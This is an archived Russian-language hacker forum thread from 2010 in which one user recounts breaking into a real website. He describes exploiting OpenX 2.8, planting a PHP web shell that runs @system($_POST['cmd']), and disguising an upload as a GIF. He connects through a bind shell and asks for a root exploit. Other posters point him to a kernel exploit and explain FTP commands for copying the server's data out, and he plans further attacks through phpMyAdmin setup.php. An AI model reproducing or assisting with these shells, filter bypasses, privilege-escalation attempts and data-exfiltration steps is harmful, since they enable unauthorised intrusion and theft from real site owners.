PDA

Просмотр полной версии : XSS - подкажите развиваться дальше.


kiberon
31.07.2010, 18:29
Ребят несколько дней назад через ОпенХ 2.8 уязвимость вошел в админ аккаунт, потом залил шелл. Просидел мой шелл там около 4 дней. )))) Но на 5 день у меня и шелл пропал, и ОпенХ тоже нету и пароль к админ панелью Апача тоже вообщем меня конкретно устранили. Но я не успокоилья, нашел ХСС на сайте. Дело такое, есть поле для ввода всяких мыслей и вырожений, типа "чего я буду делать завтра": - ОТВЕТ: Вас поламаю...))))))) ну и так дали. В поле ввода набрал


alert(document.cookie)

и обламался, потом решил нажать на "Редактировать" ну давай по редоктируем, и опять же набрал тоже самое..и удача, вижу свои кукиси. Сделал рефреш, облом, в место выполнения скрипта показывает текст, опять редактировал, нажал сохранить, и опять скрипт задействовал. Дальше набрал




";

@system($_POST['cmd']);

echo"";

?>





Ну после редактирования у меня есть поле для загрузки файла, но.. тут то и дело что ничего и не получилось, опять же как после перезагрузки страници вижу только код (((( ну что поделать дальше?

Ну сильно не пинайте, я еще не вольшебник, я только учусь )))))))))))))))))))))))))))))))))))))

Майор
02.08.2010, 13:45
так ничего не понятно, пиши что/куда(в какую форму) ввёл, потом html код страницы что получилась

kiberon
04.08.2010, 10:35
Простым способом редактирования шелла залил шелл на сервер, но там сервер файл автоматически переименовывает и дает разшерение JPG.

в шелле на первой строке пишу только GIF и сервер глотает его как гифку, а дальше не могу его запустить, потому что имя файла уже типа f_1_4125_13097_20.jpg. Открываю его, показывает отсуствие картинки. Ч то делать, как его запустить дальше?

kiberon
04.08.2010, 13:13
Так парни, я зашел через бинд шел конектился к порту 9999 но вот правал, у меня права www. uname -a выдал Linux www2.site.com 2.6.18-164.6.1.el5 #1 SMP Tue Oct 27 11:30:06 EDT 2009 i686 i6

86 i386 GNU/Linux

пока експлоит на поднятие прав не могу найти, может есть у кого то? смотрел на http://inj3ct0r.com/ ранный milw0rm но там не могу найти что надо. Поделитесь советом. Мне нужен рут на этом серваке.

Вот еще что, могу ли я через командную страку все что есть на серваке перекинуть мне на фтп?

Chest3r
06.08.2010, 23:39
Так парни, я зашел
через бинд шел конектился к порту 9999
но вот правал, у меня права www. uname -a выдал Linux www2.site.com 2.6.18-164.6.1.el5 #1 SMP Tue Oct 27 11:30:06 EDT 2009 i686 i6
86 i386 GNU/Linux
пока експлоит на поднятие прав не могу найти, может есть у кого то? смотрел на http://inj3ct0r.com/ ранный milw0rm
но там не могу найти что надо. Поделитесь советом. Мне нужен рут на этом серваке.


Может этот поможет - http://www.exploit-db.com/exploits/10613/


Вот еще что, могу ли я через командную страку все что есть на серваке перекинуть мне на фтп?


ftp> help - говорит само за себя

ftp> quit - завершить работу

ftp> bin - установить режим пересылки бинарных файлов

(настоятельно рекомендую)

ftp> cd katalog - перемещаться по "тамошним" каталогам

ftp> ls - выдать "тамошнее" оглавление

ftp> lcd katalog - перемещаться по "здешним" каталогам

ftp> !dir - выдать "здешнее" оглавление

ftp> !ls -al - выдать "здешнее" оглавление

ftp> get file-tam [ file-name-zdes ] - взять файл оттуда

ftp> put file-zdes [ file-name-tam ] - положить файл туда

Подробней тут - Ссылка (http://ns.linux.org.ua/pub/docs/mirrors/linfoline.homedns.org/howto/mini/FTP/x55.html)

fl00der
11.08.2010, 16:15
Поцаны, а как вы ищите сплойт под конкретное ведро? Какую часть версии вбивать?

RexTiam
12.08.2010, 20:05
l00der, Всем вбивать нужно для эффекта нужного)

RazyKK
16.08.2010, 02:19
а можно по подробнее про уязвимость openХ 2.8?

kiberon
16.08.2010, 15:16
Может этот поможет - http://www.exploit-db.com/exploits/10613/


нет, пробовал, выдовал ошибку mmap() типа не вхатает привилегии или че то в этом роде. Мой шелл закрилы, все базы експлоитов пробовал, ничего не помогло. Может я думаю он уже пропатченный? Вот ешил пробовать в эксплоите 10613 в место mmap пробовать mnumap или map, но уже было поздно. У меня больше нету шелла. ОпенХ тоже закрыли, доадались. шас я к ним еще постучусь, нашел phpmyadmin а внем /scripts/setup.php ну пока что не разобрался как залить шелл туда, но думаю с ващей помощью получиться Вот так вот это уже стало дело принципа

kiberon
16.08.2010, 15:17
а можно по подробнее про уязвимость openХ 2.8?


site.com/admin/install.php